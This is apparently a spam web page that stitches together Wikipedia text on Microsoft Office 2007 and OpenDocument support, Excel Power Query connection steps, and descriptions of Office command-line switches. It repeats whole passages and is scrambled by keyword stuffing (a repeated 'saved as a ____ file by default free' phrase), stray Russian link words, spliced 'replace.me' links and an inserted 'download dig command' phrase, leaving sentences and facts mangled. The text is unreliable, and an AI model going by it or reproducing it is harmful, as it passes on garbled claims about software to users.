It features Excel Web Access , the client-side component which is used to render the worksheet on a browser, Excel Calculation Service which is the server side component which populates the worksheet with data and perform calculations, and Excel Web Services that extends Excel functionalities into individual web services.

SharePoint can also be used to host Word documents for collaborative editing , by sharing a document. SharePoint can also be used to hold PowerPoint slides in a Slide Library , from which the slides can be used as a formatting template. It also notifies users of a slide automatically in case the source slide is modified. Also by using SharePoint, PowerPoint can manage shared review of presentations.

Any SharePoint hosted document can be accessed from the application which created the document or from other applications such as a browser or Microsoft Office Outlook. Microsoft Office also includes Groove , which brings collaborative features to a peer-to-peer paradigm.

Groove can host documents, including presentations, workbooks and others, created in Microsoft Office application in a shared workspace, which can then be used in collaborative editing of documents.

Groove can also be used in managing workspace sessions, including access control of the workspace. To collaborate on one or more documents, a Workspace must be created, and then those who are to work on it must be invited. Any file shared on the workspace are automatically shared among all participants. The application also provides real-time messaging, including one-to-one as well as group messaging, and presence features, as well as monitoring workspace activities with alerts, which are raised when pre-defined set of activities are detected.

Groove also provides features for conflict resolution for conflicting edits. Schedules for a collaboration can also be decided by using a built-in shared calendar, which can also be used to keep track of the progress of a project.

However, the calendar is not compatible with Microsoft Outlook. The Document Theme defines the colors, fonts and graphic effects for a document.

Almost everything that can be inserted into a document is automatically styled to match the overall document theme creating a consistent document design.

The new Office Theme file format. Similar themes are also available for data reports in Access and Project or shapes in Visio. Quick Styles are galleries with a range of styles based on the current theme. There are quick styles galleries for text, tables, charts, SmartArt, WordArt and more. Microsoft Office Outlook can also include an optional Business Contact Manager included on a separate installation disc in Office Small Business and above which allows management of business contacts and their sales and marketing activities.

This is an overview of software support for the OpenDocument format, an open document file format for saving and exchanging editable office documents. OpenDocument packages are ordinary microsoft office 2007 word documents are saved as a ____ file by default free files. There is an OpenDocument format which is just a single XML file, but most applications use the package format. Thus, any of the vast number of tools for handling zip files and XML data can be used to handle OpenDocument.

Nearly all programming languages have libraries built-in or available for processing XML files and zip files. In Octoberone year before the Microsoft Office suite was released, Microsoft declared that there is not sufficient demand from Microsoft customers for international standard OpenDocument format support and therefore it will not be included in Microsoft Office This statement was repeated also in next months.

This work was started in response to government requests for interoperability with ODF. The goal of project is not to implement ODF direct to Microsoft Office, but only to create plugin and external tools. Microsoft Office Service Http://replace.me/5765.txt 2 was released on 28 April The project, hosted on SourceForgeis an effort by several of Microsoft’s partners to create a plugin for Microsoft Office that will be freely available under a BSD license.

Independent analysis has, however, reported several concerns with these plugins, including lack of support for Office A third plug-in, OpenOpenOffice O3[84] is apparently inactive. OpenOpenOffice was download dig command for windows 10 by Phase-n, a free and open source software plug-in to enable Microsoft Office to read and write OpenDocument files and any other formats supported by OpenOffice.

Instead of installing a complete office application or even a large plug-in, O3 intended to install a tiny plug-in to the Microsoft Office system. This tiny plug-in intended to automatically send the file to some server, which would then do the conversion, returning the converted file. The server could be local to an organization so private information doesn’t go over the Internet or accessed via the Internet for those who do not want to set up a server. A beta of the server half has been completed, and further expected announcements have not occurred.

Phase-n argued that the main advantage of their approach is simplicity. Their website [85] читать больше that O3 “requires no new concepts to be explored, no significant development, and leverages the huge existing body of work already created by the OpenOffice developers, the CPAN module authors, and the Microsoft.

NET and Office teams. They also argue that this approach significantly simplifies maintenance; when a new version of OpenOffice is released, only the server needs to be upgraded. A fourth plug-in was announced by the OpenDocument Foundation in May [86] but development was stopped in October Peter Amstein and the Microsoft Office team are reluctant to make liberal use of extension mechanisms, even though provided in ODF 1.

They want to avoid all appearance of an embrace-extend attempt. Section 8. This project is an effort by several of Microsoft’s partners to create a plugin for Microsoft Office that will be freely available under a BSD license.

The project released version 1. Some open source application programming interfacesdesigned for OpenDocument handling, are available in various dynamic programming languages such as Perl and Python. The Lpod project is an example. One important issue raised in the discussion of OpenDocument is whether the format is microsoft office 2007 word documents are saved as a ____ file by default free to those with disabilities. There are two issues: does the specification support accessibility, and are implementations accessible?

Peter Korn an accessibility expert reviewed version 1. Peter Korn gave an in-depth report [99] on OpenDocument accessibility. He noted that there are many kinds of impairments, including visual minor, major, or blindphysical minor, major with vocal control, major without vocal controlauditory, and cognitive. He then noted that the situation varies, depending on the specific disability. For a vast number of disabilities, there are no known problems, though.

It is important to note that since OpenDocument is an Open Standard file format, there is no need for everyone to use the same program to read and write OpenDocument files; someone with a disability is free to use whatever program works best for them. From Wikipedia, the free encyclopedia.

For the portable building, see Mobile office. This article has multiple issues. Please help improve it or discuss these issues on the talk page. Learn how and when to remove these template messages. This article may require cleanup to meet Wikipedia’s quality standards.

No cleanup reason has been specified. Please help improve this article if you can. September Learn how and when to remove this template microsoft office 2007 word documents are saved as a ____ file by default free. This article contains content that is written like an advertisement.

Please help improve it by removing promotional content and inappropriate external linksand by adding encyclopedic content written from a neutral point of view. Retrieved 1 May Adobe Systems. Archived from the microsoft office 2007 word documents are saved as a ____ file by default free on 16 February Retrieved 28 February Archived from the original on 27 June Retrieved 1 June MW Software.

Retrieved 16 February Graeme Gott. Retrieved 13 March Microsoft Corporation. Retrieved 1 February Retrieved 18 June Archived from the original on 13 January Retrieved 21 December Archived from the original on 11 November Retrieved 11 November Retrieved 3 March Retrieved 7 June Retrieved 22 May Retrieved 20 April Archived from the original on 17 May Archived from the original on 28 December Retrieved 2 January Archived from the original on 16 June Retrieved 7 September Archived from the original on 21 July Retrieved 30 October Archived from the original on 22 July Archived from the original on 23 March Archived from the original on 4 February Retrieved 9 January Archived from the original on 29 July Retrieved 27 May Retrieved 28 January Retrieved 9 March Sun Microsystems.

Retrieved 27 January Heise Online. Archived from the original ссылка на подробности 11 July Retrieved 6 July The Register. PC World. Archived from the original PDF on 11 June Retrieved 24 May This is because the formulas used to perform calculations within a spreadsheet e. Instead of performing the calculations, what is left is when the spreadsheet is loaded in MS Excel is the last value that cell had, when previously saved.

The same test spreadsheet, when loaded and saved in all the other applications besides MS Excel e. Most other ODF spreadsheet applications are able to interoperate just fine.

The correct approach would have been for Microsoft to do the same to ensure that MS Office users can share spreadsheets with other Перейти office suites.

May 05,  · Start Word. If you are using Word , click the Microsoft Office Button, and then click Word Options.. If you are using Word or later versions, select File > Options.. On the left pane, select Advanced.. Under General, select File Locations.. Select User templates, and then select Modify.. In the Modify Location dialog box, change the setting in the Folder . By default, the Encrypt connection check box is selected to signify that Power Query connects to your database using an encrypted connection. If you do not want to connect using an encrypted connection, clear this check box, and then click Connect.. If a connection to your SQL Server is not established using an encrypted connection, Power Query prompts you to connect using an . Sep 30,  · This is the default file format of Microsoft Works, versions through xml: Word XML Document: The XML format supported in Office Word xml: Word XML Document: The XML file format supported in Word , Word , Word , Word , and Office Word (Open XML)replace.me: XPS Document. Microsoft Office XP (codenamed Office 10) is an office suite which was officially revealed in July by Microsoft for the Windows operating replace.me XP was released to manufacturing on March 5, , and was later made available to retail on May 31, , less than five months prior to the release of Windows XP. It is the successor to Office and .

Note: Your Facebook username is different from your login email. Select a category to connect to from the Connection drop-down list. For example, select Friends to give you access to all information available in your Facebook Friends category.

If necessary, click Sign in from the Access Facebook dialog, then enter your Facebook email or phone number, and password. You can check the option to remain logged in. Once signed in, click Connect. After the connection succeeds, you will be able to preview a table containing information about the selected category. For instance, if you select the Friends category, Power Query renders a table containing your Facebook friends by name.

You can create a blank query. You might want to enter data to try out some commands, or you can select the source data from Power Query:. For more information, see Manage data source settings and permissions.

This command is similar to the Get Data command on the Data tab of the Excel ribbon. This command is similar to the Recent Sources command on the Data tab of the Excel ribbon.

When you merge two external data sources, you join two queries that create a relationship between two tables. When you append two or more queries, the data is added to a query based on the names of the column headers in both tables.

The queries are appended in the order in which they’re selected. For more information, see Append queries Power Query. You can use the Power Query add-in to connect to external data sources and perform advanced data analyses. The following sections provide steps for connecting to your data sources – web pages, text files, databases, online services, and Excel files, tables, and ranges. Click the Power Query check box, then OK.

The Power Query ribbon should appear automatically, but if it doesn’t, close and restart Excel. The following video shows the Query Editor window appearing after editing a query from an Excel workbook. The following video shows one way to display the Query Editor. These automatic actions are equivalent to manually promoting a row and manually changing each column type.

For example:. The following video shows the Query Editor window in Excel appearing after editing a query from an Excel workbook. If prompted, in the From Table dialog box, you can click the Range Selection button to select a specific range to use as a data source. If the range of data has column headers, you can check My table has headers. The range header cells are used to set the column names for the query.

Note: If your data range has been defined as a named range, or is in an Excel table, then Power Query will automatically sense the entire range and load it into the Query Editor for you. Plain data will automatically be converted to a table when it is loaded into the Query Editor. You can use the Query Editor to write formulas for Power Query. You can also use the Query Editor to write formulas for Power Query. Note: While trying to import data from a legacy Excel file or an Access database in certain setups, you may encounter an error that the Microsoft Access Database Engine Microsoft.

The error occurs on systems with only Office installed. To resolve this error, download the following resources to ensure that you can proceed with the data sources you are trying to access. Microsoft Access Database Engine Redistributable.

Access Database Engine Service Pack 1. In the Access Web dialog box, click a credentials option, and provide authentication values. Power Query will analyze the web page, and load the Navigator pane in Table View. If you know which table you want to connect to, then click it from the list.

For this example, we chose the Results table. Otherwise, you can switch to the Web View and pick the appropriate table manually. In this case, we’ve selected the Results table.

Click Load , and Power Query will load the web data you selected into Excel. Windows : This is the default selection. In the next dialog box, select from Default or Custom , Windows , or Database connection options, enter your credentials, then press Connect. In the Navigator pane, select the tables or queries that you want to connect to, then press Load or Edit. In the Browse dialog box, browse for or type a file URL to import or link to a file.

Follow the steps in the Navigator dialog to connect to the table or query of your choice. After the connection succeeds, you will be able to use the Navigator pane to browse and preview the collections of items in the XML file in a tabular form. Save Data Connection File and Finish. In the Select the database that contains the data you want pane, select a database, then click Next. To connect to a specific cube in the database, make sure that Connect to a specific cube or table is selected, and then select a cube from the list.

In the Import Data dialog box, under Select how you want to view this data in your workbook , do one of the following:. To store the selected connection in the workbook for later use, click Only Create Connection. This check box ensures that the connection is used by formulas that contain Cube functions that you create and that you don’t want to create a PivotTable report.

To place the PivotTable report in an existing worksheet, select Existing worksheet , and then type the cell reference of the first cell in the range of cells where you want to locate the PivotTable report. You can also click Collapse Dialog to temporarily hide the dialog box, select the beginning cell on the worksheet that you want to use, and then press Expand Dialog. To place the PivotTable report in a new worksheet starting at cell A1, click New worksheet. To verify or change connection properties, click Properties , make the necessary changes in the Connection Properties dialog box, and then click OK.

You can either use Power Query or the Data Connection wizard. In the Access SharePoint dialog box that appears next, select a credentials option:. In the Navigator dialog, select the Database and tables or queries you want to connect to, then press Load or Edit. In the Active Directory Domain dialog box for your domain, click Use my current credentials , or Use alternate credentials.

For Use alternate credentials authentication, enter your Username and Password. After the connection succeeds, you can use the Navigator pane to browse all the domains available within your Active Directory, and drill down into Active Directory information including Users, Accounts, and Computers. See: Which version of Office am I using? If you aren’t signed in using the Microsoft Work or School account you use to access CDS for Apps, click Sign in and enter the account username and password.

If the data is good to be imported as is, then select the Load option, otherwise choose the Edit option to open the Power Query Editor. Note: The Power Query Editor gives you multiple options to modify the data returned.

For instance, you might want to import fewer columns than your source data contains. Note: If you need to retrieve your storage access key, browse to the Microsoft Azure Portal , select your storage account, and then click on the Manage Access Key icon on the bottom of the page.

Click on the copy icon to the right of the primary key, and then paste the value in the Account Key box. Note: If you need to retrieve your key, return to the Microsoft Azure Portal , select your storage account, and click on the Manage Access Key icon on the bottom of the page. Click on the copy icon to the right of the primary key and paste the value into the wizard. Click Load to load the selected table, or click Edit to perform additional data filters and transformations before loading it.

The following sections provide steps for using Power Query to connect to your data sources – web pages, text files, databases, online services, and Excel files, tables, and ranges.

Make sure you have downloaded, installed, and activated the Power Query Add-In. For Use alternate credenitals authentication, enter your Username and Password. Power Query is not available in Excel However, you can still connect to external data sources.

Step 1: Create a connection with another workbook. Near the bottom of the Existing Connections dialog box, click Browse for More. In the Select Table dialog box, select a table worksheet , and click OK. You can rename a table by clicking on the Properties button. You can also add a description. Click Existing Connections , choose the table, and click Open. In the Import Data dialog box, choose where to put the data in your workbook and whether to view the data as a Table , PivotTable , or PivotChart.

In the Select Data Source dialog box, browse to the Access database. In the Select Table dialog box, select the tables or queries you want to use, and click OK. You can click Finish , or click Next to change details for the connection.

In the Import Data dialog box, choose where to put the data in your workbook and whether to view the data as a table, PivotTable report, or PivotChart. Click the Properties button to set advanced properties for the connection, such as options for refreshing the connected data.

Optionally, you can add the data to the Data Model so that you can combine your data with other tables or data from other sources, create relationships between tables, and do much more than you can with a basic PivotTable report.

Then, in the Import Text File dialog box, double-click the text file that you want to import, and the Text Import Wizard dialog will open. Original data type If items in the text file are separated by tabs, colons, semicolons, spaces, or other characters, select Delimited. If all of the items in each column are the same length, select Fixed width.

Start import at row Type or select a row number to specify the first row of the data that you want to import. File origin Select the character set that is used in the text file. In most cases, you can leave this setting at its default. If you know that the text file was created by using a different character set than the character set that you are using on your computer, you should change this setting to match that character set. For example, if your computer is set to use character set Cyrillic, Windows , but you know that the file was produced by using character set Western European, Windows , you should set File Origin to Preview of file This box displays the text as it will appear when it is separated into columns on the worksheet.

Delimiters Select the character that separates values in your text file. If the character is not listed, select the Other check box, and then type the character in the box that contains the cursor. These options are not available if your data type is Fixed width.

Treat consecutive delimiters as one Select this check box if your data contains a delimiter of more than one character between data fields or if your data contains multiple custom delimiters. Text qualifier Select the character that encloses values in your text file. When Excel encounters the text qualifier character, all of the text that follows that character and precedes the next occurrence of that character is imported as one value, even if the text contains a delimiter character.

For example, if the delimiter is a comma , and the text qualifier is a quotation mark ” , “Dallas, Texas” is imported into one cell as Dallas, Texas. If no character or the apostrophe ‘ is specified as the text qualifier, “Dallas, Texas” is imported into two adjacent cells as “Dallas and Texas”.

If the delimiter character occurs between text qualifiers, Excel omits the qualifiers in the imported value. If no delimiter character occurs between text qualifiers, Excel includes the qualifier character in the imported value. Hence, “Dallas Texas” using the quotation mark text qualifier is imported into one cell as “Dallas Texas”.

Data preview Review the text in this box to verify that the text will be separated into columns on the worksheet as you want it. Data preview Set field widths in this section. This work was started in response to government requests for interoperability with ODF.

The goal of project is not to implement ODF direct to Microsoft Office, but only to create plugin and external tools. Microsoft Office Service Pack 2 was released on 28 April The project, hosted on SourceForge , is an effort by several of Microsoft’s partners to create a plugin for Microsoft Office that will be freely available under a BSD license. Independent analysis has, however, reported several concerns with these plugins, including lack of support for Office A third plug-in, OpenOpenOffice O3 , [84] is apparently inactive.

OpenOpenOffice was developed by Phase-n, a free and open source software plug-in to enable Microsoft Office to read and write OpenDocument files and any other formats supported by OpenOffice. Instead of installing a complete office application or even a large plug-in, O3 intended to install a tiny plug-in to the Microsoft Office system.

This tiny plug-in intended to automatically send the file to some server, which would then do the conversion, returning the converted file. The server could be local to an organization so private information doesn’t go over the Internet or accessed via the Internet for those who do not want to set up a server.

A beta of the server half has been completed, and further expected announcements have not occurred. Phase-n argued that the main advantage of their approach is simplicity. Their website [85] announces that O3 “requires no new concepts to be explored, no significant development, and leverages the huge existing body of work already created by the OpenOffice developers, the CPAN module authors, and the Microsoft.

NET and Office teams. They also argue that this approach significantly simplifies maintenance; when a new version of OpenOffice is released, only the server needs to be upgraded. A fourth plug-in was announced by the OpenDocument Foundation in May [86] but development was stopped in October Peter Amstein and the Microsoft Office team are reluctant to make liberal use of extension mechanisms, even though provided in ODF 1.

They want to avoid all appearance of an embrace-extend attempt. Section 8. This project is an effort by several of Microsoft’s partners to create a plugin for Microsoft Office that will be freely available under a BSD license. The project released version 1. Some open source application programming interfaces , designed for OpenDocument handling, are available in various dynamic programming languages such as Perl and Python.

The Lpod project is an example. One important issue raised in the discussion of OpenDocument is whether the format is accessible to those with disabilities. There are two issues: does the specification support accessibility, and are implementations accessible?

Peter Korn an accessibility expert reviewed version 1. Peter Korn gave an in-depth report [99] on OpenDocument accessibility. It enables using Active Directory for Groove user accounts, and create Groove Domains , with individual policy settings.

It allows Groove workspaces to be hosted at the server, and the files in the workspaces made available for collaborative editing via the Groove client. It also includes the Groove Server Data Bridge component to allow communication between data stored at both Groove clients and servers and external applications. Microsoft Office Project Server allows one to centrally manage and coordinate projects. It allows budget and resource tracking, and activity plan management.

The project data and reports can also be further analyzed using Cube Building Service. The project management data can be accessed from a browser as well.

Microsoft Office Project Portfolio Server allows creation of a project portfolio, including workflows, hosted centrally, so that the information is available throughout the enterprise, even from a browser. It also aids in centralized data aggregation regarding the project planning and execution, and in visualizing and analyzing the data to optimize the project plan. It can also support multiple portfolios per project, to track different aspects of it. It also includes reporting tools to create consolidated reports out of the project data.

Microsoft PerformancePoint Server allows users to monitor, analyze, and plan their business as well as drive alignment, accountability, and actionable insight across the entire organization. It includes features for scorecards, dashboards, reporting, analytics, budgeting and forecasting, among others. Even though the ribbon can be hidden, PC World wrote that the new “ribbon” interface crowds the Office work area, especially for notebook users.

As a result, users who were more familiar with the logic of the old menus would be somewhat frustrated with the new, more visually oriented ribbon. The ribbon cannot be moved from the top to the side of the page, as floating toolbars could be.

Some users with experience using previous versions of Microsoft Office have complained about having to find features in the ribbon. Others state that having learnt to use the new interface, it has improved the speed with which “professional-looking” documents can be created. Microsoft contractor Mike Gunderloy left Microsoft partially over his disagreement with the company’s “sweeping land grab ” including its attempt to patent the ribbon interface.

He says “Microsoft itself represents a grave threat to the future of software development through its increasing inclination to stifle competition through legal shenanigans. The new XML-based document file format in Microsoft Office is incompatible with previous versions of Microsoft Office unless an add-on is installed for the older version. PC World has stated that upgrading to Office presents dangers to certain data, such as templates, macros, and mail messages.

The new Word features for bibliographies only support a small number of fixed citation styles. Using XSLT, new styles can be added. Some extra styles, such as the standard Association for Computing Machinery publication format, are made freely available by third parties. From Wikipedia, the free encyclopedia.

Version of Microsoft Office. These four programs make up the Home and Student edition. Service Pack 3 Main article: Ribbon computing. Main article: OpenDocument software. Main article: Microsoft Word. Main article: Microsoft Outlook. Main article: Microsoft Excel. Main article: Microsoft PowerPoint. Main article: Microsoft OneNote. Main article: Microsoft Access.

Main article: Microsoft Publisher. Main article: Microsoft InfoPath. Main article: Microsoft Visio. Main article: Microsoft Project. Main article: Microsoft SharePoint Designer. Main article: Microsoft Office Forms Server. Main article: Microsoft Office Groove Server. Main article: Microsoft Office Project Server. News Center. January 29, Archived from the original on September 24, Retrieved November 9, Computer World.

Archived from the original on September 25, System requirements for the Office release. Archived from the original on September 14, Archived from the original on March 7, PC World. Archived from the original on November 10, DailyTech, LLC. Archived from the original on March 23, CIO Magazine. Archived from the original on March 5, Microsoft TechNet.

Wasif K Niazi. Retrieved March 10, Office Support. CBS Interactive. Archived from the original on March 12, Microsoft Support. Archived from the original on July 29, Retrieved June 17, August 27, Retrieved September 14, An Office User Interface Blog. Archived from the original on September 4, Retrieved October 30, Archived from the original on March 10, Retrieved August 13, Archived from the original on January 7, Retrieved November 10, Retrieved December 17, April 28, May 21, Archived from the original on August 5, Archived from the original on February 18, October 22, Retrieved February 5, Archived from the original on September 10, Archived from the original on May 24, Retrieved May 25, Archived from the original on July 3, I Started Something.

Retrieved March 19, The empty quotation marks are necessary; the quotation marks around PrinterName and the path to the PPTX file are needed only if there are spaces in either of the names, but it is always a good idea to use them.

Restores PowerPoint to the way it was before the program closed abnormally. When PowerPoint restarts, it will attempt to recover and restore some aspects of the state of the program and presentations before it closed.

Note: The playlist file is a list of presentation file names preceded by the path as needed. It is not possible to add additional command-line switches to the individual presentations within the playlist.

If no item type is specified, IPM. Note is assumed. Cannot be used with message classes that are not based on Outlook. Deletes any custom category names that you have created.

Restores categories to the default names. CAT entries for a conversation thread usually expire 30 days after no activity.

The command-line switch clears all conversation tagging, ignore, and moving rules immediately stopping any additional actions. Outlook , only.

All previous roamed preferences are deleted and copied again from the local settings on the computer where this switch is used. Therefore, it is recommended that you only run this command when your Outlook profile only contains the one, target mailbox. This is useful if you cannot delete one of these subscriptions within Outlook Overrides the programmatic lockout that determines which of your computers when you run Outlook at the same time processes meeting items.

The lockout process helps prevent duplicate reminder messages. This switch clears the lockout on the computer it is used. This enables Outlook to process meeting items.

Imports the contents of an. If Outlook is already open, queues the profile to be imported on the next clean start. Provides a way for the user to add an e-mail name to the item. Loads the specified profile. If your profile name contains a space, enclose the profile name in quotation marks ” “. Opens the Choose Profile dialog box regardless of the Options setting on the Tools menu. Starts Outlook by using an existing Outlook window, if one exists.

Note: This is the same command as Upgrade to Color Categories in each Outlook mailbox properties dialog box. Resets default folder names such as Inbox or Sent Items to default names in the current Office user interface language. For example, if you first connect to your mailbox in Outlook by using a Russian user interface, the Russian default folder names cannot be renamed.

To change the default folder names to another language, such as Japanese or English, you can use this switch to reset the default folder names after you change the user interface language or install a different language version of Outlook. Empties the form regions cache and reloads the form region definitions from the Windows registry. Attempts to open the same profile and folders that were open prior to an abnormal Outlook shutdown.

Starts Outlook without the Reading Pane or toolbar customizations. Starts Outlook and opens the specified folder in a new window. Specifies a sharing URL to connect to Outlook. Starts Outlook, forces a detection of new meeting requests in the Inbox , and then adds them to the calendar. Opens the specified database or Microsoft Access project. You can include a path, if necessary. If the path contains spaces, enclose it in quotation marks. Opens the specified Access database for exclusive access.

To open the database for shared use in a multiuser environment, omit this switch. Applies to Access databases only. Starts Access by using the options in the specified user profile instead of the standard Windows Registry settings created when you installed Access. To compact to a different name, specify a target file. If you include a path that contains spaces, enclose the path in quotation marks.

If you specify a file name in the target database or target Access project parameter but you don’t include a path, the target file is created in the default database folder that is specified in Access. You can change this setting in the Access Options dialog box. In an Access project, this option compacts the Access project.

Another way to run a macro when you open a database is to create a macro named AutoExec. Macros can contain viruses, so you must be careful about running them. Take the following precautions: run up-to-date antivirus software on your computer; use the Trust Center to disable all macros except those that are digitally signed; maintain a list of trusted sources of macros. Specifies that what follows on the command line is the value that will be returned by the Command function.

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